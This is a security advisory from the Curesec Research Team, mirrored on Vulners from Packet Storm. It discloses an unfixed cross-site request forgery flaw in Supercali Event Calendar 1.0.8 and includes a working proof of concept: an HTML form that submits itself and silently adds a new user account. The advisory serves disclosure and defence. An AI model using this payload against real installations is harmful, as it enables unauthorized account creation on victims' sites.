Lucene search
K

Supercali Event Calendar 1.0.8 Cross Site Request Forgery

🗓️ 07 Nov 2015 00:00:00Reported by Tim CoenType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Supercali Event Calendar 1.0.8 CSRF vulnerability not fixe

Code
`Security Advisory - Curesec Research Team  
  
1. Introduction  
  
Affected Product: Supercali Event Calendar 1.0.8  
Fixed in: not fixed  
Fixed Version Link: n/a  
Vendor Website: http://supercali.inforest.com/  
Vulnerability Type: CSRF  
Remote Exploitable: Yes  
Reported to vendor: 09/01/2015  
Disclosed to public: 10/07/2015  
Release mode: Full Disclosure  
CVE: n/a  
Credits Tim Coen of Curesec GmbH  
  
2. Vulnerability Description  
  
None of the forms of Supercali Event Calendar 1.0.8 have CSRF protection, which  
means that an attacker can perform actions for the victim if the victim visits  
an attacker controlled site while logged in.  
  
3. Proof of Concept  
  
Add a User:  
  
  
<html>  
<body>  
<form name="myform" action="http://localhost/supercali-1.0.8/supercali-1.0.8/admin_actions.php" method="POST">  
<input type="hidden" name="id" value="add" />  
<input type="hidden" name="email" value="admin2" />  
<input type="hidden" name="new_password" value="foo" />  
<input type="hidden" name="return_to" value="" />  
<input type="hidden" name="mode" value="Add Profile" />  
<input type="submit" value="Submit request" />  
</form>  
<script>document.myform.submit();</script>  
</body>  
</html>  
  
4. Solution  
  
This issue was not fixed by the vendor.  
  
5. Report Timeline  
  
09/01/2015 Informed Vendor about Issue (no reply)  
10/07/2015 Disclosed to public  
  
  
Blog Reference:  
http://blog.curesec.com/article/blog/Supercali-Event-Calendar-108-CSRF-68.html  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation